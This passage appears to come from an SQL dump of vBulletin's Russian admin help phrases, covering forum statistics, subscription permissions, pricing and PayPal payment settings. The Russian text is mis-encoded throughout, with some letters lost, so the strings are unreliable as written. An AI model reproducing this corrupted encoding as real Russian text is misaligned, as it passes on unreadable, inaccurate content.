\r\n\r\nÂû ìîæåòå èçó÷èòü îïðåäåëåííóþ ñòàòèñòèêó â îïðåäåëåííîì ïåðèîäå, ÷òîáû ïîñìîòðåòü ôîðìû àêòèâíîñòè íà âàøåì ôîðóìå. Ôîðìû àêòèâíîñòè íà ôîðóìå ìîãóò èñïîëüçîâàòüñÿ â ðàçíûõ âåùàõ. Ãàïðèìåð, åñëè âû çàïóñòèëè ðåêëàìíóþ êàìïàíèþ äëÿ âàøåãî ñàéòà è æåëàåòå ïðîâåðèòü å¸ ýôôåêòèâíîñòü â ðàìêàõ íîâûõ ðåãèñòðàöèé íà ôîðóìå, òî âû ìîæåòå ïîñìîòðåòü ñòàòèñòèêó ðåãèñòðàöèé äî êàìïàíèè è âî âðåìÿ íå¸.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (23915, -1, 'stats_title', 'cphelptext', 'ÃŽ ñòàòèñòèêå', 'vbulletin', '', 0, ''), (23916, -1, 'stats_index_text', 'cphelptext', 'Ññûëêà \"Ñòàòèñòèêà ëó÷øèõ\" ïåðåàäðåñóåò âàñ íà ñòðàíèöó, ãäå âû ñìîæåòå ïðîñìîòðåòü ñëåäóþùèå äàííûå ñòàòèñòèêè: ñàìûé íîâûé ïîëüçîâàòåëü íà ôîðóìå, ðåêîðä ïîñåùàåìîñòè ïîëüçîâàòåëåé, ïîëüçîâàòåëü ñ íàèáîëüøèì êîëè÷åñòâîì ñîîáùåíèé íà ôîðóìå, ñàìàÿ îáñóæäàåìàÿ òåìà, ñàìàÿ ïðîñìàòðèâàåìàÿ òåìà è ñàìûé ïîïóëÿðíûé ðàçäåë.

\r\n\r\nÑñûëêè \"Ñòàòèñòèêà ðåãèñòðàöèé\", \"Ñòàòèñòèêà àêòèâíîñòè ïîëüçîâàòåëåé\", \"Ñòàòèñòèêà íîâûõ òåì\" è \"Ñòàòèñòèêà íîâûõ ñîîáùåíèé\" ïåðåàäðåñóþò âàñ íà ñòðàíèöû, ãäå âû ñìîæåòå óâèäåòü ñîîòâåòñòâóþùèå ñòàòèñòèêè íà îñíîâå äíåé, íåäåëü èëè ìåñÿöåâ.', 'vbulletin', '', 0, ''), (23917, -1, 'stats_index_title', 'cphelptext', 'Ñòàòèñòèêà', 'vbulletin', '', 0, ''), (23918, -1, 'stats_reg_activity_thread_post_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå âû ìîæåòå âûáðàòü îò÷¸ò î íóæíîé ñòàòèñòèêå. Âûáåðèòå ïåðèîä âðåìåíè, íà êàêèå ïðîìåæóòêè åãî ðàçáèòü è ïîðÿäîê ñîðòèðîâêè. Êîãäà âû ñäåëàåòå âûøåñêàçàííîå, âû ìîæåòå íàæàòü íà êíîïêó \"Âïåð¸ä\", ÷òîáû óâèäåòü ñòàòèñòèêó. Ñìîòðèòå ñîîòâåòñòâóþùèå ðàçäåëû ñïðàâêè, åñëè ó âàñ åñòü âîïðîñû.', 'vbulletin', '', 0, ''), (23919, -1, 'stats_reg_activity_thread_post_title', 'cphelptext', 'Ñòàòèñòèêà', 'vbulletin', '', 0, ''), (23920, -1, 'stats_reg_activity_thread_post_start_text', 'cphelptext', 'Âûáåðèòå äàòó íà÷àëà äëÿ ýòîé âûáîðêè. Óêàæèòå ìåñÿö, äåíü è ãîä. Âûáðàííàÿ ñòàòèñòèêà äîëæíà áûòü íå ñòàðøå ýòîé äàòû.', 'vbulletin', '', 0, ''), (23921, -1, 'stats_reg_activity_thread_post_start_title', 'cphelptext', 'Ãà÷àëüíàÿ äàòà', 'vbulletin', '', 0, ''), (23922, -1, 'stats_reg_activity_thread_post_end_text', 'cphelptext', 'Âûáåðèòå äàòó îêîí÷àíèÿ äëÿ ýòîé âûáîðêè. Óêàæèòå ìåñÿö, äåíü è ãîä. Âûáðàííàÿ ñòàòèñòèêà äîëæíà áûòü íå íîâåå ýòîé äàòû. Âû ìîæåòå èñïîëüçîâàòü ýòó îïöèþ âìåñòå ñ îïöèåé \"Äàòà íà÷àëà\", ÷òîáû ñîçäàòü âðåìåííîé ïðîìåæóòîê.', 'vbulletin', '', 0, ''), (23923, -1, 'stats_reg_activity_thread_post_end_title', 'cphelptext', 'Êîíå÷íàÿ äàòà', 'vbulletin', '', 0, ''), (23924, -1, 'stats_reg_activity_thread_post_scope_text', 'cphelptext', 'Âûáåðèòå ïðîìåæóòîê âðåìåíè, â òå÷åíèè êîòîðîãî âû æåëàåòå ïîëó÷èòü ñòàòèñòèêó. Åñëè âû âûáåðèòå \"åæåäíåâíî\", òî ñòàòèñòèêà áóäåò ïî äíÿì.', 'vbulletin', '', 0, ''), (23925, -1, 'stats_reg_activity_thread_post_scope_title', 'cphelptext', 'Ãîêàçàòü', 'vbulletin', '', 0, ''), (23926, -1, 'stats_reg_activity_thread_post_sort_text', 'cphelptext', '\"Âîçðàñòàþùèé\" ïîðÿäîê îòïðàâèò áîëåå ñòàðûå äàòû â íà÷àëî è ñàìûå íîâûå â êîíåö; äàòû \"âîçðàñòàþò\" ïî ìåðå ÷òåíèÿ ñòàòèñòèêè. \"Óáûâàþùèé\" - ýòî òî æå ñàìîå, íî íàîáîðîò.', 'vbulletin', '', 0, ''), (23927, -1, 'stats_reg_activity_thread_post_sort_title', 'cphelptext', 'Ñîðòèðîâêà ïî âðåìåíè', 'vbulletin', '', 0, ''), (23928, -1, 'stats_reg_activity_thread_post_nullvalue_text', 'cphelptext', 'Åñëè \"Ãåò\", òî äíè, íåäåëè è ìåñÿöû, â êîòîðûõ ïîèñê íå äàñò ðåçóëüòàòîâ, íå áóäóò îòîáðàæåíû.', 'vbulletin', '', 0, ''), (23929, -1, 'stats_reg_activity_thread_post_nullvalue_title', 'cphelptext', 'Ãóñòûå ðåçóëüòàòû', 'vbulletin', '', 0, ''), (23930, -1, 'stats_top_text', 'cphelptext', 'Ãèæå íàõîäèòñÿ ñïèñîê òðèâèàëüíûõ ñòàòèñòèê âàøåãî ôîðóìà. Âû ìîæåòå íàæàòü íà èíäèâèäóàëüíûå ññûëêè â ñòàòèñòèêå, ÷òîáû óâèäåòü ñîîòâåòñòâóþùåãî ïîëüçîâàòåëÿ, òåìó èëè ðàçäåë.', 'vbulletin', '', 0, ''), (23931, -1, 'stats_top_title', 'cphelptext', 'Ñòàòèñòèêà ëó÷øèõ', 'vbulletin', '', 0, ''), (23932, -1, 'subscriptionpermission_text', 'cphelptext', 'Ñïðàâî÷íûå ñòàòüè:
\r\nÃîäïèñêè
\r\nÃðàâà ïîäïèñîê

\r\n\r\nÃðàâà ïîäïèñîê:
\r\nÃî óìîë÷àíèþ, ïîëüçîâàòåëè èìåþò ïðàâà íà îôîðìëåíèå ëþáîé äîñòóïíîé ïîäïèñêè (ñì. Óïðàâëåíèå ïîäïèñêàìè). Îäíàêî, âû ìîæåòå çàïðåòèòü êàêèì-ëèáî ãðóïïàì ïîëüçîâàòåëåé îôîðìëåíèå îïðåäåë¸ííîé ïîäïèñêè. Ãîëüçîâàòåëü äîëæåí áûòü ÷ëåíîì îñíîâíîé èëè äîïîëíèòåëüíîé ãðóïïû ïîëüçîâàòåëåé, êîòîðîé ðàçðåøåíà äàííàÿ ïîäïèñêà, èíà÷å îí íå ñìîæåò îôîðìèòü å¸.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (23933, -1, 'subscriptionpermission_title', 'cphelptext', 'ÃŽ ïðàâàõ ïîäïèñîê', 'vbulletin', 'zCarot', 1146682049, '3.6.0 Beta 1'), (23934, -1, 'subscriptionpermission_edit_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå âû ìîæåòå çàïðåòèòü èëè ðàçðåøèòü îôîðìëåíèå îïðåäåë¸ííûõ ïîäïèñîê îïðåäåë¸ííûì ãðóïïàì ïîëüçîâàòåëåé. Îïöèè îïèñûâàþòñÿ íèæå.', 'vbulletin', 'zCarot', 1151503112, '3.6.0 Beta 4'), (23935, -1, 'subscriptionpermission_edit_title', 'cphelptext', 'Ãåäàêòèðîâàíèå ïðàâ ïîäïèñîê', 'vbulletin', 'zCarot', 1146682105, '3.6.0 Beta 1'), (23936, -1, 'subscriptionpermission_edit_usesub_text', 'cphelptext', 'Ãî óìîë÷àíèþ ïîëüçîâàòåëè ìîãóò îôîðìèòü ëþáóþ ïîäïèñêó. Åñëè æå çäåñü âû óñòàíîâèòå \"Ãåò\", òî äàííàÿ ãðóïïà ïîëüçîâàòåëåé íå ñìîæåò îôîðìèòü äàííóþ ïîäïèñêó. Ãîìíèòå, ÷òî ïîëüçîâàòåëü ìîæåò ÿâëÿòüñÿ ÷ëåíîì, êàê îñíîâíîé ãðóïïû, òàê è äîïîëíèòåëüíîé. Åñëè ïîäïèñêà ðàçðåøåíà îäíîé èç äîïîëíèòåëüíîé ãðóïï ïîëüçîâàòåëÿ, òî îí âñ¸ ðàâíî ñìîæåò îôîðìèòü ïîäïèñêó, äàæå åñëè îñíîâíàÿ ãðóïïà íå èìååò ïðàâà íà ýòî.', 'vbulletin', 'zCarot', 1146682517, '3.6.0 Beta 1'), (23937, -1, 'subscriptionpermission_edit_usesub_title', 'cphelptext', 'Ìîæåò èñïîëüçîâàòü ïîäïèñêó', 'vbulletin', 'zCarot', 1146682517, '3.6.0 Beta 1'), (23938, -1, 'subscriptionpermission_modify_text', 'cphelptext', 'Çäåñü âû ìîæåòå çàïðåòèòü êàêîé-ëèáî ãðóïïå ïîëüçîâàòåëåé îôîðìëÿòü îïðåäåë¸ííóþ ïîäïèñêó. Äëÿ êàæäîé ïîäïèñêè âû óâèäèòå ñïèñîê âñåõ äîñòóïíûõ ãðóïï ïîëüçîâàòåëåé. Åñëè èìÿ ãðóïïû âûäåëåíî êðàñíûì, òî èì çàïðåùåíî îôîðìëÿòü äàííóþ ïîäïèñêó. Åñëè èìÿ ãðóïïû âûäåëåíî ÷¸ðíûì, òî ó íèõ åñòü ïðàâî íà îôîðìëåíèå ïîäïèñêè. ×òîáû èçìåíèòü ïðàâà, íàæìèòå \"Ãåäàêòèðîâàòü\" ðÿäîì ñ ãðóïïîé, ïðàâà êîòîðîé íà îôîðìëåíèå äàííîé ïîäïèñêè âû æåëàåòå èçìåíèòü.', 'vbulletin', 'zCarot', 1146682613, '3.6.0 Beta 1'), (23939, -1, 'subscriptionpermission_modify_title', 'cphelptext', 'Èçìåíåíèå ïðàâ ïîäïèñîê', 'vbulletin', 'zCarot', 1146682613, '3.6.0 Beta 1'), (23940, -1, 'subscriptions_text', 'cphelptext', 'Ãîäïèñêè:
\r\nÓïðàâëåíèå ïîäïèñêàìè ôîðóìà èñïîëüçóåòñÿ äëÿ îïëàòû ïîëüçîâàòåëÿìè äîñòóïà ê ôîðóìó. Óáåäèòåñü, ÷òî âû âêëþ÷èëè êàê ìèíèìóì îäèí ñïîñîá ïëàòåæåé â óïðàâëåíèè ñïîñîáàìè îïëàòû, åñëè âû èñïîëüçóåòå êîììåð÷åñêèå ïîäïèñêè.

\r\n\r\nÓïðàâëåíèå ïîäïèñêàìè äîñòóïîì ê ôîðóìó ïðîèñõîäèò ñ ïîìîùüþ äîáàâëåíèÿ è óäàëåíèÿ îñíîâíûõ è äîïîëíèòåëüíûõ ãðóïï ïîëüçîâàòåëåé, à òàêæå óïðàâëåíèåì ìàñêàìè äîñòóïà. Äëÿ ïîÿñíåíèé ïî ãðóïïàì ïîëüçîâàòåëåé è ïðàâàì ôîðóìà ñìîòðèòå ñïðàâî÷íûå ñòàòüè â ðàçäåëå \"Ãðóïïû ïîëüçîâàòåëåé\".', 'vbulletin', 'zCarot', 1209481464, '3.7.1'), (23941, -1, 'subscriptions_title', 'cphelptext', 'ÃŽ ïîäïèñêàõ', 'vbulletin', '', 0, ''), (23942, -1, 'subscriptions_add_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì äîáàâèòü íîâóþ ïîäïèñêó. Åñëè ó âàñ åñòü âîïðîñû ïî îïöèÿì íèæå, òî èçó÷èòå ñîîòâåòñòâóþùèå ñïðàâî÷íûå ñòàòüè.

\r\n\r\nÅñëè âû æåëàåòå èñïîëüçîâàòü ýòó ïîäïèñêó äëÿ óïðàâëåíèÿ ìàñêàìè äîñòóïà ïîëüçîâàòåëåé, òî óáåäèòåñü, ÷òî ìàñêè äîñòóïà âêëþ÷åíû â âàøèõ îñíîâíûõ íàñòðîéêàõ.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'), (23943, -1, 'subscriptions_add_title', 'cphelptext', 'Äîáàâèòü ïîäïèñêó', 'vbulletin', '', 0, ''), (23944, -1, 'subscriptions_add_varname_text', 'cphelptext', 'Ãòî èìÿ ïîäïèñêè, èñïîëüçóåìîå âíóòðè ôîðóìà. Îíî ìîæåò ñîäåðæàòü òîëüêî ëàòèíñêèå áóêâû, öèôðû è ñèìâîëû ïîä÷¸ðêèâàíèÿ. Ãà÷èíàòüñÿ äîëæíî îáÿçàòåëüíî ñ áóêâû.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (23945, -1, 'subscriptions_add_varname_title', 'cphelptext', 'Êðàòêîå èìÿ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (23946, -1, 'subscriptions_add_edit_adminavatar_text', 'cphelptext', 'Ãòà îïöèÿ áóäåò ó÷èòûâàòüñÿ, òîëüêî åñëè ïðè äåéñòâóþùåé ïîäïèñêå ïîëüçîâàòåëþ äàþò ïðàâî èìåòü íåñòàíäàðòíûé àâàòàð.\r\n\r\nÅñëè ïîëüçîâàòåëü âî âðåìÿ äåéñòâèÿ ïîäïèñêè âûáåðåò íåñòàíäàðòíûé àâàòàð, òî äàííàÿ îïöèÿ îïðåäåëÿåò, ñëåäóåò ëè ñîõðàíèòü å¸ ïðè èñòå÷åíèè ïîäïèñêè, åñëè îáû÷íûå ïðàâà ïîëüçîâàòåëÿ íå ðàçðåøàþò åìó èìåòü íåñòàíäàðòíûé àâàòàð.', 'vbulletin', 'zCarot', 1144702919, '3.6.0 Beta 1'), (23947, -1, 'subscriptions_add_edit_adminavatar_title', 'cphelptext', 'Ñîõðàíèòü íåñòàíäàðòíûé àâàòàð', 'vbulletin', 'zCarot', 1144702919, '3.6.0 Beta 1'), (23948, -1, 'subscriptions_add_edit_adminprofilepic_text', 'cphelptext', 'Ãòà îïöèÿ áóäåò ó÷èòûâàòüñÿ, òîëüêî åñëè ïðè äåéñòâóþùåé ïîäïèñêå ïîëüçîâàòåëþ äàþò ïðàâî èìåòü ôîòîãðàôèþ.\r\n\r\nÅñëè ïîëüçîâàòåëü âî âðåìÿ äåéñòâèÿ ïîäïèñêè âûáåðåò ôîòîãðàôèþ, òî äàííàÿ îïöèÿ îïðåäåëÿåò, ñëåäóåò ëè ñîõðàíèòü å¸ ïðè èñòå÷åíèè ïîäïèñêè, åñëè îáû÷íûå ïðàâà ïîëüçîâàòåëÿ íå ðàçðåøàþò åìó èìåòü ôîòîãðàôèþ.', 'vbulletin', 'zCarot', 1205942626, '3.7.0 Release Candidate 1'), (23949, -1, 'subscriptions_add_edit_adminprofilepic_title', 'cphelptext', 'Ñîõðàíèòü ôîòîãðàôèþ', 'vbulletin', 'zCarot', 1144702948, '3.6.0 Beta 1'), (23950, -1, 'subscriptions_add_edit_title_text', 'cphelptext', 'Çàãîëîâîê ïîäïèñêè èñïîëüçóåòñÿ â êà÷åñòâå èäåíòèôèêàòîðà äàííîé ïîäïèñêè íà ñòðàíèöå Êîììåð÷åñêèå ïîäïèñêè â êàáèíåòå ïîëüçîâàòåëÿ, à òàêæå â óïðàâëåíèè ïîäïèñêàìè â ïàíåëè àäìèíèñòðàòîðà. Çàãîëîâîê äîëæåí êðàòêî îòðàæàòü ñóòü ïîäïèñêè.

Èñïîëüçóéòå ññûëêó \"Ãåðåâîä íà äðóãèå ÿçûêè\", ÷òîáû ñäåëàòü çàãîëîâîê ïîäïèñêè ïîíÿòíûì âñåì ïîëüçîâàòåëÿì.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (23951, -1, 'subscriptions_add_edit_title_title', 'cphelptext', 'Çàãîëîâîê', 'vbulletin', '', 0, ''), (23952, -1, 'subscriptions_add_edit_description_text', 'cphelptext', 'Ââåäèòå îïèñàíèå ýòîé ïîäïèñêè. Îïèñàíèå äîëæíî äàâàòü ïîíÿòü ïîëüçîâàòåëþ, ÷òî îí ïîëó÷èò, êóïèâ å¸. Îïèñàíèå îòîáðàæàåòñÿ íà ñòðàíèöå Êîììåð÷åñêèå ïîäïèñêè â êàáèíåòå ïîëüçîâàòåëÿ ïðè ïîêóïêå ïîäïèñîê.

Èñïîëüçóéòå ññûëêó \"Ãåðåâîä íà äðóãèå ÿçûêè\", ÷òîáû ñäåëàòü îïèñàíèå ïîäïèñêè ïîíÿòíûì âñåì ïîëüçîâàòåëÿì.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (23953, -1, 'subscriptions_add_edit_description_title', 'cphelptext', 'Îïèñàíèå', 'vbulletin', '', 0, ''), (23954, -1, 'subscriptions_add_edit_active_text', 'cphelptext', 'Îòìåòüòå ýòîò ïóíêò, åñëè âû æåëàåòå ñäåëàòü ïîäïèñêó äîñòóïíîé äëÿ ïîëüçîâàòåëåé, ÷òîáû îíè ñìîãëè ïîäïèñàòüñÿ íà íå¸. Àêòèâíûå ïîäïèñêè äîñòóïíû íà ñòðàíèöå Ãëàòíûå ïîäïèñêè â êàáèíåòå ïîëüçîâàòåëÿ. Åñëè âû æåëàåòå óäàëèòü ïîäïèñêó, íî ïðåäïîëàãàåòå èñïîëüçîâàòü å¸ â áóäóùåì, òî âû ìîæåòå ïðîñòî ñíÿòü îòìåòêó ñ ýòîãî ïóíêòà äëÿ å¸ îòìåíû, âìåñòî òîãî, ÷òîáû ïîëíîñòüþ å¸ óäàëÿòü.', 'vbulletin', '', 0, ''), (23955, -1, 'subscriptions_add_edit_active_title', 'cphelptext', 'Âêëþ÷åí', 'vbulletin', '', 0, ''), (23956, -1, 'subscriptions_add_edit_length_text', 'cphelptext', 'Ââåäèòå ÷èñëî â òåêñòîâîå ïîëå è âûáåðèòå ïðîìåæóòîê âðåìåíè äëÿ óêàçàíèÿ ïðîäîëæèòåëüíîñòè ïîäïèñêè.', 'vbulletin', '', 0, ''), (23957, -1, 'subscriptions_add_edit_length_title', 'cphelptext', 'Ñðîê ïîäïèñêè', 'vbulletin', '', 0, ''), (23958, -1, 'subscriptions_add_edit_sub[cost][usd]_text', 'cphelptext', 'Ââåäèòå ñòîèìîñòü ýòîé ïîäïèñêè â äîëëàðàõ ÑØÀ. Ââåäèòå 0.00, åñëè âû íå æåëàåòå ïðèíèìàòü ïëàòåæè â äîëëàðàõ ÑØÀ íà ýòó ïîäïèñêó.

\r\n\r\nÅñëè âû æåëàåòå ïîäñ÷èòàòü ýêâèâàëåíò äîëëàðîâ ÑØÀ â äðóãîé âàëþòå, òî âû ìîæåòå èñïîëüçîâàòü ýòîò ñàéò.', 'vbulletin', '', 0, ''), (23959, -1, 'subscriptions_add_edit_sub[cost][usd]_title', 'cphelptext', 'Ñòîèìîñòü â äîëëàðàõ ÑØÀ', 'vbulletin', '', 0, ''), (23960, -1, 'subscriptions_add_edit_sub[cost][gbp]_text', 'cphelptext', 'Ââåäèòå ñòîèìîñòü ýòîé ïîäïèñêè â ôóíòàõ ñòåðëèíãîâ. Ââåäèòå 0.00, åñëè âû íå æåëàåòå ïðèíèìàòü ïëàòåæè â ôóíòàõ ñòåðëèíãîâ íà ýòó ïîäïèñêó.

\r\n\r\nÅñëè âû æåëàåòå ïîäñ÷èòàòü ýêâèâàëåíò ôóíòîâ ñòåðëèíãîâ â äðóãîé âàëþòå, òî âû ìîæåòå èñïîëüçîâàòü ýòîò ñàéò.', 'vbulletin', '', 0, ''), (23961, -1, 'subscriptions_add_edit_sub[cost][gbp]_title', 'cphelptext', 'Ñòîèìîñòü â ôóíòàõ ñòåðëèíãîâ', 'vbulletin', '', 0, ''), (23962, -1, 'subscriptions_add_edit_sub[cost][eur]_text', 'cphelptext', 'Ââåäèòå ñòîèìîñòü ýòîé ïîäïèñêè â åâðî. Ââåäèòå 0.00, åñëè âû íå æåëàåòå ïðèíèìàòü ïëàòåæè â åâðî íà ýòó ïîäïèñêó.

\r\n\r\nÅñëè âû æåëàåòå ïîäñ÷èòàòü ýêâèâàëåíò åâðî â äðóãîé âàëþòå, òî âû ìîæåòå èñïîëüçîâàòü ýòîò ñàéò.', 'vbulletin', '', 0, ''), (23963, -1, 'subscriptions_add_edit_sub[cost][eur]_title', 'cphelptext', 'Ñòîèìîñòü â åâðî', 'vbulletin', '', 0, ''), (23964, -1, 'subscriptions_add_edit_nusergroupid_text', 'cphelptext', 'Åñëè âû æåëàåòå, ÷òîáû ýòà ïîäïèñêà èçìåíÿëà îñíîâíóþ ãðóïïó ïîëüçîâàòåëåé, òî âûáåðèòå íóæíóþ ãðóïïó ïîëüçîâàòåëåé çäåñü. Âûáåðèòå \"ÃÃ¥ èçìåíÿòü\", åñëè âû íå æåëàåòå, ÷òîáû ïîäïèñêà ìåíÿëà îñíîâíóþ ãðóïïó ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (23965, -1, 'subscriptions_add_edit_nusergroupid_title', 'cphelptext', 'Îñíîâíàÿ ãðóïïà ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (23966, -1, 'subscriptions_add_edit_membergroup_text', 'cphelptext', 'Åñëè âû æåëàåòå, ÷òîáû ýòà ïîäïèñêà äîáàâëÿëà ïîëüçîâàòåëÿ â êàêèå-ëèáî äîïîëíèòåëüíûå ãðóïïû ïîëüçîâàòåëåé, òî âû ìîæåòå âûáðàòü èõ çäåñü. Êîãäà ïîëüçîâàòåëü ïîäïèøåòñÿ íà ýòó ïîäïèñêó, îí ñðàçó æå áóäåò äîáàâëåí â ýòè äîïîëíèòåëüíûå ãðóïïû ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (23967, -1, 'subscriptions_add_edit_membergroup_title', 'cphelptext', 'Äîïîëíèòåëüíûå ãðóïïû ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (23968, -1, 'subscriptions_add_edit_tax_text', 'cphelptext', 'Ãðèìåíèìî òîëüêî äëÿ ïëàòåæåé Paypal, åñëè âû âêëþ÷èëè íàëîã ñ ïðîäàæ â íàñòðîéêàõ ïðîäàæ àêêàóíòà paypal, è ïîêóïàòåëü íàõîäèòñÿ â çîíå, íà êîòîðóþ âû óñòàíîâèëè íàëîã.

Ãî óìîë÷àíèþ, íàëîã íå áóäåò äîáàâëåí ê ïëàòåæàì. Âûáåðèòå ýòó îïöèþ, åñëè âû æåëàåòå äîáàâèòü íàëîã.', 'vbulletin', 'zCarot', 1198800926, '3.7.0 Beta 4'), (23969, -1, 'subscriptions_add_edit_tax_title', 'cphelptext', 'Ãàëîã ïðîäàæ', 'vbulletin', '', 0, ''), (23970, -1, 'subscriptions_add_edit_shipping_text', 'cphelptext', 'Ãðèìåíèìî òîëüêî äëÿ ïëàòåæåé Paypal.

Âû ìîæåòå âûáðàòü, äîëæåí áûòü àäðåñ ïëàòåëüùèêà áûòü íåîáÿçàòåëüíûì, îáÿçàòåëüíûì, èëè îí íå äîëæåí óêàçûâàòüñÿ.', 'vbulletin', 'zCarot', 1198800913, '3.7.0 Beta 4'), (23971, -1, 'subscriptions_add_edit_shipping_title', 'cphelptext', 'Àäðåñ îïëàòû', 'vbulletin', '', 0, ''), (23972, -1, 'subscriptions_add_edit_displayorder_text', 'cphelptext', 'Ãòîò ïàðàìåòð îïðåäåëÿåò ïîçèöèþ ïîäïèñêè â ñïèñêå äîñòóïíûõ ïîäïèñîê.', 'vbulletin', '', 0, ''), (23973, -1, 'subscriptions_add_edit_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðàæåíèÿ ïî', 'vbulletin', '', 0, ''), (23974, -1, 'subscriptions_add_edit_recurring_text', 'cphelptext', 'Ãðèìåíèìî òîëüêî äëÿ ïëàòåæåé Paypal.

Âû ìîæåòå âûáðàòü, ñìîæåò ëè ïëàòåëüùèê âîçâðàòèòü ïëàò¸æ ïðè îòìåíå ïîäïèñêè.

\r\nÃîñëå òîãî êàê âû âêëþ÷èòå ýòó îïöèþ âû áîëåå íå ñìîæåòå èçìåíèòü öåíó ýòîé ïîäïèñêè, òàê êàê öåíà äëÿ ñóùåñòâóþùèõ ïîëüçîâàòåëåé íå áóäåò îáíîâëåíà. Îäíàêî, âû ìîæåòå îòìåíèòü âñå èõ ïîäïèñêè ÷åðåç èíòåðôåéñ PayPal è ïðèíóäèòü èõ ïåðåîôîðìèòü ïîäïèñêó ñíîâà.', 'vbulletin', 'zCarot', 1200668171, '3.7.0 Beta 4'), (23975, -1, 'subscriptions_add_edit_recurring_title', 'cphelptext', 'Âîçâðàò ïëàòåæà', 'vbulletin', '', 0, ''), (23976, -1, 'subscriptions_adjust_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå âû ìîæåòå äîáàâèòü/îòðåäàêòèðîâàòü ïîäïèñêó. Åñëè âû ðåäàêòèðóéòå ïîäïèñêó, òî âû ìîæåòå å¸ ñîêðàòèòü, ïðîäëèòü, ñäåëàòü àêòèâíîé èëè âûêëþ÷åííîé ñ ïîìîùüþ îïöèé íèæå. Åñëè âû äîáàâëÿåòå ïîäïèñêó, òî âàì ñëåäóåò çàïîëíèòü ïîëÿ íèæå.', 'vbulletin', 'zCarot', 1205942653, '3.7.0 Release Candidate 1'), (23977, -1, 'subscriptions_adjust_title', 'cphelptext', 'Äîáàâëåíèå/ðåäàêòèðîâàíèå ïîäïèñêè', 'vbulletin', '', 0, ''), (23978, -1, 'subscriptions_adjust_username_text', 'cphelptext', 'Ââåäèòå ñóùåñòâóþùåå èìÿ ïîëüçîâàòåëÿ, êîìó âû æåëàåòå äîáàâèòü ýòó ïîäïèñêó.', 'vbulletin', '', 0, ''), (23979, -1, 'subscriptions_adjust_username_title', 'cphelptext', 'Èìÿ', 'vbulletin', '', 0, ''), (23980, -1, 'subscriptions_adjust_regdate_text', 'cphelptext', 'Ãòà äàòà îçíà÷àåò âðåìÿ íà÷àëà àêòèâíîñòè ïîäïèñêè. Âûáåðèòå ìåñÿö è ââåäèòå äåíü, ãîä, ÷àñ è ìèíóòó.', 'vbulletin', '', 0, ''), (23981, -1, 'subscriptions_adjust_regdate_title', 'cphelptext', 'Ãà÷àëüíàÿ äàòà', 'vbulletin', '', 0, ''), (23982, -1, 'subscriptions_adjust_expirydate_text', 'cphelptext', 'Ãòà äàòà îçíà÷àåò âðåìÿ, êîãäà äåéñòâèå ïîäïèñêè ïðåêðàòèòñÿ. Âûáåðèòå ìåñÿö è ââåäèòå äåíü, ãîä, ÷àñ è ìèíóòó.', 'vbulletin', '', 0, ''), (23983, -1, 'subscriptions_adjust_expirydate_title', 'cphelptext', 'Äàòà èñòå÷åíèÿ', 'vbulletin', '', 0, ''), (23984, -1, 'subscriptions_adjust_status_text', 'cphelptext', 'Âûáåðèòå \"Äà\", åñëè âû æåëàåòå, ÷òîáû ïîäïèñêà áûëà àêòèâíîé.  ïðîòèâíîì ñëó÷àå âûáåðèòå \"Ãåò\".', 'vbulletin', '', 0, ''), (23985, -1, 'subscriptions_adjust_status_title', 'cphelptext', 'Âêëþ÷åí', 'vbulletin', '', 0, ''), (23986, -1, 'subscriptions_api_text', 'cphelptext', 'Ãòîò ðàçäåë ïîçâîëÿåò âàì óïðàâëÿòü ñèñòåìàìè îïëàòû, ê êîòîðûì âû æåëàåòå îáðàùàòüñÿ äëÿ ïëàòíûõ ïîäïèñîê ôîðóìà.

\r\n\r\nÑèñòåìà îïëàòû - ýòî êîìïàíèÿ, ÷åðåç êîòîðóþ ìîæíî îñóùåñòâëÿòü ðàçíîîáðàçíûå ïëàòåæè. Ãàïðèìåð, åñëè ó âàñ åñòü ó÷åòíàÿ çàïèñü Paypal è âû âêëþ÷èòå ýòó ñèñòåìó íà äàííîé ñòðàíèöå, òî ïîëüçîâàòåëè ñìîãóò èñïîëüçîâàòü Paypal äëÿ îïëàòû ïëàòíûõ ïîäïèñîê íà âàøåì ôîðóìå.', 'vbulletin', 'zCarot', 1198800939, '3.7.0 Beta 4'), (23987, -1, 'subscriptions_api_title', 'cphelptext', 'Óïðàâëåíèå ñïîñîáàìè îïëàòû', 'vbulletin', '', 0, ''), (23988, -1, 'subscriptions_apiadd_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì äîáàâèòü íîâûé ñïîñîá îïëàòû. Ãàðàìåòðû ñîçäàíèÿ îïèñàíû íèæå.', 'vbulletin', '', 0, ''), (23989, -1, 'subscriptions_apiadd_title', 'cphelptext', 'Äîáàâëåíèå ñïîñîáà', 'vbulletin', '', 0, ''), (23990, -1, 'subscriptions_apiadd_apiedit_title_text', 'cphelptext', 'Ãòî íàçâàíèå ñèñòåìû îïëàòû. Èñïîëüçóåòñÿ òîëüêî â êà÷åñòâå íàèìåíîâàíèÿ.', 'vbulletin', '', 0, ''), (23991, -1, 'subscriptions_apiadd_apiedit_title_title', 'cphelptext', 'Çàãîëîâîê', 'vbulletin', '', 0, ''), (23992, -1, 'subscriptions_apiadd_apiedit_active_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëèò âàì âêëþ÷èòü/âûêëþ÷èòü äàííóþ ñèñòåìó îïëàòû áåç óäàëåíèÿ è ñîçäàíèÿ îíîé. Åñëè ñèñòåìà îïëàòû âûêëþ÷åíà, òî îíà íå áóäåò äîñòóïíà äëÿ ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (23993, -1, 'subscriptions_apiadd_apiedit_active_title', 'cphelptext', 'Âêëþ÷åí', 